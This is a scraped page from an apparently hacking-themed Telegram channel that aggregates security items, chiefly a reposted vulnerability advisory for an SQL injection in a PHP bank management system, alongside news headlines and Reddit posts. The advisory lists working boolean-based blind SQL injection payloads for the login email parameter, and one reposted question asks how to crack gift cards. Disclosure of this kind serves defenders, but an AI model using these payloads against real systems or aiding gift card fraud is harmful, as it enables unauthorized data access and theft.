Hacking Articles Tips Tricks Videos Tutorials
471 subscribers
66K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Bank Management System 1.0 SQL Injection

https://2.bp.blogspot.com/-QZ2Sf2sxziM/WWlvZhEG73I/AAAAAAAAIO0/d0s8s4TXkHwnfXzbpubNEBqDxa568NQgwCLcBGAs/s1600/h60.png
Bank Management System version 1.0 suffers from a remote SQL injection vulnerability.

MD5 | a1b518f4ff9226b46978f92199b94421

Download
# Title: Bank Management System - MCB Bank v1.0 - SQLi
# Author: nu11secur1ty
# Date: 02.25.2022
# Vendor: https://www.campcodes.com/projects/php/ by:Tariq Fareeds
# Software: https://www.campcodes.com/projects/php/bank-management-system-in-php-mysql-free-download/
# Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System
## Description:
The email parameter from Bank Management System - MCB Bank v1.0
appears to be vulnerable to SQL injection attacks.
The payloads 30735302' or 9098=9098-- and 41995976' or 3071=3078--
were each submitted in the email parameter.
These two requests resulted in different responses, indicating that
the input is being incorporated into a SQL query in an unsafe way
WARNING: If this is in some external domain, or some subdomain
redirection, or internal whatever, this will be extremely dangerous!
Status: CRITICAL
[+] Payloads:

```mysql
---
Parameter: email (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: email=-9337' OR 4870=4870-- Cgzq&password=q7A!t8j!H2&cashierLogin=
---

```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/campcodes.com/Bank-Management-System)

## Proof and Exploit:
[href](https://streamable.com/hvaaiu)


Source:packetstormsecurity.com

___________________________
@hacking_Attack
@Hacking_Video
Dark Reading: Attacks/Breaches
Ukrainian Troops Targeted in Phishing Attacks by Suspected Belarusian APT

Ukraine's Computer Emergency Response Team calls out UNIC1151 nation-state hacking group out of Belarus as behind the attacks.
hacking: security in practice
gift card cracking

is there any method for gift card cracking

submitted by /u/AftonGobble
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
hacking: security in practice
FOSS for training skills

Hi, can you recommend a few FOSS web apps for training pen testing skills?

submitted by /u/LaughNervous
[link] [comments]

___________________________
@hacking_Attack
@Hacking_Video
Bug Bounty: My Work Schedule

According to the 2020 H1 report:Continue reading on Medium »
Read more...
Dark Reading: Attacks/Breaches
7 Steps to Take Right Now to Prepare for Cyberattacks by Russia

A lot of the recommended preparation involves measures organizations should have in place already.